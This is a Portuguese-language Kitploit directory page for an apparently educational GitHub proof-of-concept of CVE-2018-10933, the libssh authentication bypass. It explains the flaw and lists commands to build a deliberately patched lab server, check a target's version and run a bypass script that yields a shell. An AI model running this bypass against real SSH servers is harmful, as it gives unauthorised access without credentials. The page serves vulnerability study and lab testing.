Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-10933 — Propósito educacional para CVE-2018-10933 | Kitploit
Ferramentas/GitHubGitHub/hsw109/cve-2018-10933
Análise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubhsw109/cve-2018-10933

CVE-2018-10933

Propósito educacional para CVE-2018-10933

Ver Repositório
41há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Recriar e melhorar o cenário da CVE-2018-10933

[Explicação]

root@kitploit:~
 Este conteúdo tem finalidade educacional sobre a CVE-2018-10933, que é a bypass de autenticação no libSSH!
 As versões 0.6 e superiores do libssh têm uma vulnerabilidade de bypass de autenticação no código do servidor.
 Ao apresentar ao servidor uma mensagem SSH2_MSG_USERAUTH_SUCCESS no lugar da mensagem SSH2_MSG_USERAUTH_REQUEST
 que o servidor esperaria para iniciar a autenticação, o atacante poderia autenticar com sucesso
 sem quaisquer credenciais.

 A pasta "patch" contém código modificado no servidor para fins de teste (que injeta um pacote SSH2_MSG_USERAUTH_SUCCESS durante qualquer autenticação),
 porque essa vulnerabilidade foi corrigida desde a versão libSSH-0.7.5 (é complicado regenerar um ambiente compatível com uma versão antiga do libSSH)    

[Uso]

Se quiser executar este PoC na sua máquina, siga as instruções.

  • Clone os repositórios.

  • Adicionar a biblioteca à máquina local

root@kitploit:~
sudo cp CVE-2018-10933-PoC/libssh-0.8.3/src/* /usr/local/lib
  • Instalar as dependências do Python
root@kitploit:~
pip install -r requirements.txt
Baixar ferramenta
  • Iniciar o servidor (modificado com patches):
root@kitploit:~
cd libssh-0.8.3
root@kitploit:~
./ssh_server -v [server_IP] -p [port] -d ssh_host_dsa_key -k ssh_host_rsa_key
  • Verificando a versão do servidor:
root@kitploit:~
python3 libSSHcheck.py -t [server_IP] -p [server_port]
  • Em seguida, você recebe a mensagem, que é o banner.

  • Execute o payload e, em seguida, você obtém um shell:

root@kitploit:~
python3 paramikoBypass.py -t [server_IP] -p [server_port] 

=> Sucesso!

[Referência]

root@kitploit:~
https://github.com/hackerhouse-opensource/
https://www.exploit-db.com/exploits/45638